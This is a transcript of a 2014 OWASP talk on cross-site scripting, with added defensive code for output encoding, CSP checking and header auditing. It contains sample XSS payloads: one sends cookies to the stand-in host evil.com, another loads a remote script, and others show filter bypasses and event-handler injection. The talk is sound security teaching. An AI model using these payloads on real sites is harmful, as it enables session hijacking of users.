owasp top 10 a3: cross site scripting (xss)

OWASP A3: Cross Site Scripting Dubai, UAE. 27 August 2014 Michael Hendrickx <[email protected]>

Upload: michael-hendrickx

Post on 08-Jun-2015


DESCRIPTION

A talk I gave for the OWASP UAE chapter in Dubai, explaining A3 from the OWASP Top 10 list: Cross Site Scripting.

TRANSCRIPT

Page 1: Owasp Top 10 A3: Cross Site Scripting (XSS)

OWASP A3: Cross Site Scripting

Dubai, UAE. 27 August 2014
Michael Hendrickx <[email protected]>

Page 2: Owasp Top 10 A3: Cross Site Scripting (XSS)

Talk Outline

• What is XSS?
• Real life examples
• How to exploit it?
• How to prevent it?

Page 3: Owasp Top 10 A3: Cross Site Scripting (XSS)

What is XSS?

• Cross Site Scripting (XSS)
• An attack against other clients

Page 4: Owasp Top 10 A3: Cross Site Scripting (XSS)

What is XSS? (2)

• Webpages are a mix of content, style and code
– We want to inject code

<html>
  <head>
    <style>h1 { color: #FF0000 }</style>
  </head>
  <body>
    <h1>Hello World</h1>
    <script>
      document.write("How are you?");
    </script>
  </body>
</html>

(Slide labels: the <style> block is Style, the <h1> is Content, the <script> is Code.)

Page 5: Owasp Top 10 A3: Cross Site Scripting (XSS)

What is XSS? (3)

• Request:

http://site.com/hello.php?name=<script>alert("hacked!");</script>

• Response:

<html>
  <body>
    <div>
      Hello <script>alert("hacked!");</script>!
    </div>
  </body>
</html>

Page 6: Owasp Top 10 A3: Cross Site Scripting (XSS)

What can be done with XSS?

• Execute “active content”
– Client side scripts (usually JavaScript, VBScript, …)

• Access cookie contents
– Steal your session

• Read keystrokes
• Submit forms, send data, …
• Exploit browser bugs

Page 7: Owasp Top 10 A3: Cross Site Scripting (XSS)

Real Life Examples

• MySpace Worm “Samy” [1]

– Visiting an infected profile would add the author as “friend”.
– Infects own profile, thus infecting other friends
– 1.000.000 infections in 20 hours

• TweetDeck XSS Worm [2]

– Users automatically retweeted malicious code
– 80.000 infections

[1] http://namb.la/popular/
[2] http://www.forbes.com/sites/davelewis/2014/06/11/twitter-experiences-xss-flaw-in-tweetdeck/

Page 8: Owasp Top 10 A3: Cross Site Scripting (XSS)

Real Life Examples (2)

• Facebook [1]

– Vulnerable to cross site scripting
– Luckily, reported to the Facebook security team

• Yahoo! services [2]

– 100’s of Yahoo’s subdomains vulnerable
– Basically everything with a comment

[1] https://www.acunetix.com/websitesecurity/xss-facebook/
[2] http://nahamsec.com/2014/05/how-i-xssed-all-of-yahoos-services/

Page 9: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit XSS?

• Try to display your code to somebody else
• 3 Types of XSS

– Stored XSS
  • Persistent XSS
  • Malicious payload is stored in DB and is run by others

– Reflected XSS
  • Non persistent
  • Payload is embedded in URL
  • Victim visits malicious URL and gets exploited

– DOM based XSS
  • Payload executed by modifying DOM environment
  • Can be persistent / non-persistent

Page 10: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit stored XSS?

• Requirements:
– Web page that saves user input
– Displays unfiltered* input back to others
  • Same page (comment, posts on a forum, …)
  • Other page (in-app messages, ads, profile, …)

*: Unfiltered or inadequately filtered

Page 11: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit stored XSS? (2)

• Career website

First name: John
Last name: Doe<script>document.write('<img src="http://evil.com/a.gif?' + escape(document.cookie) + '"/>')</script>

(Slide diagram: the attacker injects active content into the “resume”; the HR manager accesses the resume and unknowingly sends the cookie contents to the external website evil.com.)

Cookie contains session ID, attacker can log in as victim.

Page 12: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit reflected XSS?

• Requirements:
– Web page that displays an unfiltered* part of the URL
– Convince victim to click on a link
  • Using “social engineering”, email, IM, …
  • May bypass phishing defences, since the link points at the correct domain
  • Payload can be obfuscated

*: Unfiltered or inadequately filtered

Page 13: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit reflected XSS? (2)

• Career website

Hey, this candidate seems interesting!
http://site.com/search_cv.aspx?name=<script src="http://evil.com/a.js"></script>

(Slide diagram: the victim opens the link and loads the malicious JavaScript from evil.com.)

Page 14: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to exploit DOM XSS?

• When the webpage modifies the DOM (Document Object Model) with untrusted data

http://site.com/page.php#<script>alert('xss');</script>

<html>
  …
  <script type="text/javascript" src="jquery.js"></script>
  <script>
    $("#mydiv").after("Site is at : " + document.location.href);
  </script>
  <div id="mydiv"></div>
  …
</html>

The fragment after # is never sent to the server, so server-side filtering never sees it; document.location.href still contains it, and .after() inserts the string as HTML.

Page 15: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to prevent XSS?

• Clients: Disable JavaScript
• Web Application Firewall
– Microsoft IIS Secure Parameter Filtering
  IIS module that only accepts untampered input
  https://spf.codeplex.com/

– ModSecurity
  Open source WAF module to detect and block attacks
  http://modsecurity.org

Page 16: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to prevent XSS? (2)

• Solve the problem at the core:
• Code refactoring
– Data input filtering
  • Make sure we don’t accept / store any unwanted data

– Data output filtering / encoding
  • Even if we have unwanted data, escape it so we don’t execute JavaScript

Page 17: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to prevent XSS? (3)

• Convert output characters
– Encoded characters will not be interpreted

Original   Encoded
&          &amp;
<          &lt;
>          &gt;
"          &quot;
'          &#x27;
/          &#x2F;

https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet

Page 18: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to prevent XSS? (4)

• It’s not just about stripping out HTML tags
– If you only filter out “<script>”:

<scr<script>ipt>

• Injection can happen in many places:
– Event handlers:

<body onload="alert('xss');">

– CSS:

<p style="background:url('javascript:alert(123)');">

– URLs:

<img title=something onclick=alert(1) ...> Look ma, no quotes!
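Added example, not from the slides: the naive “<script>” blacklist warned about above, side by side with output encoding per the OWASP table on slide 17, run over the payloads shown on this slide (embedded here as constructed input). The `containsTag` check is a demo heuristic, not a general XSS detector.

```javascript
// Added example (not from the slides): the naive "<script>" blacklist from
// slide 18 beside output encoding per the OWASP table on slide 17, run over
// the payloads shown on the slides (embedded here as constructed input).

// Naive blacklist filter: removes the literal tag once, as the slide warns.
function stripScriptTags(input) {
  return input.replace(/<script>/gi, "");
}

// Output encoding: the six characters from the OWASP prevention cheat sheet.
const HTML_ESCAPES = {
  "&": "&amp;", "<": "&lt;", ">": "&gt;",
  '"': "&quot;", "'": "&#x27;", "/": "&#x2F;",
};

function escapeHtml(input) {
  return input.replace(/[&<>"'\/]/g, (ch) => HTML_ESCAPES[ch]);
}

// Demo check only: a raw "<" followed by a letter can still open a tag when
// the string is written into an HTML body; encoded output never contains one.
function containsTag(output) {
  return /<\/?[a-z]/i.test(output);
}

// Payloads from slide 18, constructed here as sample input.
const PAYLOADS = [
  "<scr<script>ipt>",                        // becomes <script> after one strip
  "<body onload=\"alert('xss');\">",         // event handler, no <script> at all
  "<img title=something onclick=alert(1)>",  // unquoted attributes
];

function compare(payload) {
  const stripped = stripScriptTags(payload);
  const encoded = escapeHtml(payload);
  return {
    stripped, encoded,
    strippedStillHasTag: containsTag(stripped),
    encodedStillHasTag: containsTag(encoded),
  };
}

for (const p of PAYLOADS) console.log(compare(p));
```

The stripped output of the first payload is exactly `<script>`, while the encoded output of every payload contains no `<` at all and is rendered as literal text.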

Page 19: Owasp Top 10 A3: Cross Site Scripting (XSS)

How to prevent XSS? (5)

• Useful code libraries
– OWASP HTML Sanitizer Project
  https://www.owasp.org/index.php/OWASP_Java_HTML_Sanitizer_Project

– Microsoft Web Protection Library
  http://wpl.codeplex.com/

– Microsoft AntiXSS Library
  http://www.microsoft.com/en-us/download/details.aspx?id=43126

– HTML Purifier
  http://htmlpurifier.org/

Page 20: Owasp Top 10 A3: Cross Site Scripting (XSS)

XSS Mitigations

• Use HttpOnly cookies
– Will prevent JS from accessing cookies

Cache-Control: private
Content-Length: 150
Content-Type: text/html; charset=utf-8
Date: Mon, 25 Aug 2014 10:26:07 GMT
Location: /fvquickpay/frmPayOnline.aspx
Server: Microsoft-IIS/8.5
Set-Cookie: ASP.NET_SessionId=iqqkkt55il3ynxuqi1dckk55; path=/; HttpOnly
X-Aspnet-Version: 2.0.50727
X-Powered-By: ASP.NET

Page 21: Owasp Top 10 A3: Cross Site Scripting (XSS)

XSS Mitigations (2)

• Implement CSP
– Content Security Policy
– Whitelist origins of external data

Content-Security-Policy: default-src 'self'; script-src 'self' static.domain.tld

Allow JS, CSS and images from the same host. Allow JS also from static.domain.tld. Because 'unsafe-inline' is not listed, inline <script> blocks (the typical injected payload) are blocked as well.
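Added example, not from the slides: a small evaluator for the policy above that answers “would this script or image source be allowed?”. It handles the 'self' keyword, plain host sources and the default-src fallback; scheme sources, wildcards, nonces and hashes are out of scope. The page URL www.domain.tld and the evil.example host in the comments are assumed sample values.

```javascript
// Added example (not from the slides): evaluate the slide's CSP against
// candidate resource URLs. Covers 'self', host sources and default-src
// fallback only (no wildcards, schemes, nonces or hashes).

function parseCsp(header) {
  const policy = {};
  for (const directive of header.split(";")) {
    const parts = directive.trim().split(/\s+/);
    if (parts[0]) policy[parts[0]] = parts.slice(1);
  }
  return policy;
}

// Sources for a directive, falling back to default-src as browsers do.
function sourcesFor(policy, directive) {
  return policy[directive] || policy["default-src"] || [];
}

// Would a browser on `pageUrl` be allowed to load `url` for `directive`?
function cspAllows(header, directive, pageUrl, url) {
  const page = new URL(pageUrl);
  const target = new URL(url);
  return sourcesFor(parseCsp(header), directive).some((src) => {
    if (src === "'none'") return false;
    if (src === "'self'") return target.origin === page.origin;
    // host-source: compare host (and port, if given), ignoring the scheme
    const [host, port] = src.replace(/^[a-z]+:\/\//i, "").split(":");
    return target.hostname === host && (!port || target.port === port);
  });
}

// Inline <script> blocks (the typical injected payload) only run when the
// effective script-src lists 'unsafe-inline'.
function cspAllowsInlineScript(header) {
  return sourcesFor(parseCsp(header), "script-src").includes("'unsafe-inline'");
}

// Constructed sample: the slide's policy (directive names carry no colon)
// and an assumed page URL on the same site.
const CSP = "default-src 'self'; script-src 'self' static.domain.tld";
const PAGE = "https://www.domain.tld/index.html";
```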

Page 22: Owasp Top 10 A3: Cross Site Scripting (XSS)

XSS Mitigations (3)

• Instruct the browser to enable or disable its built-in XSS protection (IE/Chrome)

X-XSS-Protection: 1; mode=block

Value            Meaning
0                Disables XSS protection
1                Enables XSS protection
1; mode=block    Enabled, blocks the page instead of sanitizing
1; report=url    Enabled, allows a report to be sent to the specified URL

Source: http://blog.veracode.com/2014/03/guidelines-for-setting-security-headers/
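Added example, not from the slides: a small audit of a response header block for the three controls on slides 20 to 22 (HttpOnly on cookies, presence of a Content-Security-Policy, and the X-XSS-Protection value). The header block is constructed sample input modelled on the IIS response on slide 20, with a placeholder session ID and an added non-HttpOnly cookie to show a finding.

```javascript
// Added example (not from the slides): audit raw response headers for the
// XSS mitigations discussed on slides 20-22. Sample input is constructed.

const SAMPLE_RESPONSE = [
  "Content-Type: text/html; charset=utf-8",
  "Server: Microsoft-IIS/8.5",
  "Set-Cookie: ASP.NET_SessionId=EXAMPLE; path=/; HttpOnly", // placeholder id
  "Set-Cookie: theme=dark; path=/",                          // constructed
  "X-XSS-Protection: 1; mode=block",
].join("\r\n");

// Parse "Name: value" lines; repeated names (Set-Cookie) are kept as a list.
function parseHeaders(raw) {
  const headers = {};
  for (const line of raw.split(/\r?\n/)) {
    const i = line.indexOf(":");
    if (i < 0) continue;
    const name = line.slice(0, i).trim().toLowerCase();
    if (!headers[name]) headers[name] = [];
    headers[name].push(line.slice(i + 1).trim());
  }
  return headers;
}

// Returns a list of findings; an empty list means all three checks passed.
function auditXssHeaders(raw) {
  const h = parseHeaders(raw);
  const findings = [];
  for (const cookie of h["set-cookie"] || []) {
    const name = cookie.split("=")[0].trim();
    const attrs = cookie.split(";").slice(1).map((a) => a.trim().toLowerCase());
    if (!attrs.includes("httponly")) findings.push(`cookie ${name} lacks HttpOnly`);
  }
  if (!h["content-security-policy"]) findings.push("no Content-Security-Policy header");
  const xss = (h["x-xss-protection"] || [])[0];
  if (xss === undefined) findings.push("X-XSS-Protection not set");
  else if (xss.startsWith("0")) findings.push("X-XSS-Protection disabled (0)");
  return findings;
}

console.log(auditXssHeaders(SAMPLE_RESPONSE));
```

HttpOnly only keeps an injected script from reading the cookie; it does not stop the script from acting as the user within the page, which is why the slides treat it as one layer among several.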

Page 23: Owasp Top 10 A3: Cross Site Scripting (XSS)

Conclusion

• You’re not the target, your users are
– Customers, sysadmins, …

• Don’t trust anything coming from the user
– Even if it’s stored in the DB
– Check it server side, always.

• Filter using whitelists, not blacklists
• Layered security measures
• Escape all output

Page 24: Owasp Top 10 A3: Cross Site Scripting (XSS)

Questions?

Michael [email protected] | @ndrix

Further reading:
https://www.owasp.org/index.php/XSS_Prevention_Cheat_Sheet
https://html5sec.org/
http://securityoverride.org/filedb/file_db/Articles/xss.pdf